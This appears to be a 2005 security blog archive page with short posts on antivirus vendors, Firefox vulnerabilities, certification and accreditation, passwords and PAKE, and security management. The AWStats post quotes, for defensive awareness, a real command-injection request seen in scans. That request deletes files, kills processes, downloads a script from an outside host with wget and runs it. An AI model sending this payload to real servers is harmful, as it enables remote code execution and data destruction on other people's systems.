I just attended a session on Better Threat Scanning with Symantec Antivirus version 10 at the Symantec Virtual Academy. They offered people the chance to sign up for free sessions to showcase the virtual classroom. It was a one hour session where as their normal class on this subject would run across three days . Normally each day would have a few hours of lecture in the morning and labwork in the afternoon. The session used Interwise software. I think the last time I used interwise it created an autorunning item in my systray.
Archive for September 2005
Firefox Disappoints
How many vulnerabilities does a “secure” browser need to have before people realize they were a bit hasty with the bandwagon jumping. I dont care how many secunia graphs you use to defend your niche browser. I’m thinking more than a handful of vulnerabilities could be a sign.
F-Secure – “We Can’t Protect You”
http://www.f-secure.com/weblog/#00000655
Mikko Hypponen wrote: Bottom line: if your organization is still, in year 2005, accepting incoming executable attachments in email, now might be a good time to rethink your strategy. Because it looks like these guys won’t be stopping any time soon.
Wow, two antivirus companies in one week waving the white flag. I always knew that they couldn’t protect anyone from a new virus, but I never expected them to admit it. At some point about 7 years ago this would have resulted in shocked disillusionment amongst administrators. But now days it barely elicits a ripple. I would have expected people to storm the gates of F-Secure demanding a refund. Why pay tens of thousands of dollars in protection money if the anti-virus cartel can’t get the job done?
So we have to participate in a chaotic file blocking scheme because it doesn’t look like F-Secure will be able to stop these guys any time soon. Soon they’ll just shut down email altogether in the morning from 8am to 10 am. That when most viruses come though know. 
First they came for the scr files
and I did not speak out
because I did not email scr files.
Then they came for the vbs files
and I did not speak out
because I was did not get any vbs files (and I was jealous of everyone else and their loveletter.vbs).
Then they came for the zip files
and I did not speak out
because I could send my zip files via IM file transfer.
Then they came for doc, xls and pdf files
and there was no one left
business was so disrupted everyone just went out to the bar for a pint.
apologies to Pastor Martin Niemöller
You can’t stop a virus
Did you see the October issue of Information Security Magazine? (requires free subscription, or try bugmenot.com)
In it, they have an article ‘Best Advice’ which is a collection of advice from 24 security “luminaries” such as Mike Nash, Mikko Hypponen, Congressman Tom Davis (!), and Eugene Spafford. Eva Chen, CEO of Trend Micro,’s “best advice” is “you can’t stop a virus.” Well, pack it up, game over. Shut down the billion dollar antivirus industry. If it cant stop a virus, what is it good for?
Eva’s explanation of that quote, makes even less sense. She says that most enterprise customers have boundary-less, interconnected supply chains running on one global TCP-IP network. That somehow those interconnections are more important than stopping the virus. It sounds like her only defense against the virus is to shut down the network.
I marvel at the antivirus industry. First you sell yourself on the ability to solve everything. So that computers (at least those running windows) cannot be considered “secure” without antivirus software. Next when the myth of antivirus software is broken, that is it cannot possibly push out virus definitions fast enough to get all viruses, they attempt to sell add-on functionality. What you really need isn’t antivirus. Its antivirus and a personal firewall, and a host based IDS. Fix your broken antivirus software rather than selling me additional pieces. McAfee for example has added in some buffer overflow protection into their antivirus product. Why is no one else innovating?
I can’t wait for the correction. E.g. “eva didn’t really say you can’t stop a virus. Her best advice was really risk management needs to be multifaceted.”
Awstats exploits
SANS ISC highlighted awstats attacks today in the diary. I’m seeing the same sort of thing. Scans looking for
awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20http://geocities.com/ventor_team/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo|
I think that is a 9 month old awstats vuln. If you’re running it you should patch it, and password protect the directory it is installed in.
C & A Security
Certification and Accreditation. Is it the path to security? Does it even purport to be that? I find myself asking that question as I review the site security plan we are putting together where I work. I’m all for best practices. But one best practice is not applicable everywhere. As Jesper Johhanson has written, it is a myth that security check lists will protect you.
I liked what Richard Bejtlich said about this:
Millions of dollars and thousands of hours are spent on C&A, and C&A levels are used to assess security. In reality C&A is a 20-year-old paperwork exercise that does not yield improved security. The only real way to measure security is to track the numbers and types of compromise over time, and try to see that number decrease.
Gartner: Move Beyond Passwords
At the Gartner IT Security Summit in London, Ant Allan said that “passwords are no longer adequate, as threats against them increase.”
He seems to advocate multi-factor authentication in spite of the expense of smartcards or SecurID.
In my Advanced Network Security course, the first project has to do with implementing a protocol called PAKE. This was proposed last decade. It is a secure method of authentication using password where the password is not sent over the wire. Rather in a DH like fashion the user is able to prove to the server that it knows the password. So an active attacker cannot gain advantage by sniffing the logon. Also the server does not even store the password in a format that is useful if the PDV is stolen. Any two-factor authentication should perform authenticate both the server and the client, and not be susceptible to man in the middle. This makes PAKE an interesting study, although i”m not sure how well it scales.
Symantec False Positive
If you’ve got Symantec Antivirus and you’ve got Webroot Spysweeper, than you probably have seen a Backdoor.Graybird detection today. This is a false positive. The files typically detected are in the temp director and named mc21.tmp or mc22.tmp in my experience.
I have called Symantec support, the next set of virus defs released should solve this problem. The current set of Rapid Release defs do fix this but I’d rather wait for “certified” definitions.
Gartner: Security Leadership belongs to CxO
http://software.silicon.com/security/0,39024655,39152300,00.htm
IT departments should not be calling the shots on security, according to Jay Heiser, research VP at Gartner Research. Instead, companies need to take a business-oriented, risk-management approach. Stepping back from technical details allows a company’s IT practices to be forward-looking, aligned with the core business, and provide better return on investment. Zurich Financial Services halved its IT costs by outsourcing the commodity aspects of IT and security and focusing on policy rather than the technical aspects of the firewall. Heiser says that IT training is not enough anymore, but the job of managing IT risk requires a business school background majoring in risk management.
I would agree that risk management is an important part of computer security. You need to decide what is important. What it would cost if damaged. What it would cost to repair, what it would cost to protect. That is a business decision, not a techie decision. However, if you remove the decision from the IT department itself, or remove it from the CIO or CSO then there is a communications gulf that becomes difficult to cross.
It has always been the security techs job to explain what the problem is, how it will effect business, and what it will cost to fix. Was I.T. training alone ever enough?
In the same venue, there is an article in SC Magazine that say the next generation of security experts will need to be business savvy as much as they are technically knowledgeable. “take your best and brightest security people and teach them more about business rather than worrying about getting them CISSPs and CISMs.”
Soft skills are essential. But that doesn’t mean you can just take a suit and turn him into a Information Security professional. At the same time, unless you want to get relegated to the basement (like I.T pre-2000) you need to have the interpersonal skills, you need to be able to explain security issues, you need to be able to communicate with your manager, your director and your CIO and relate why this is important.
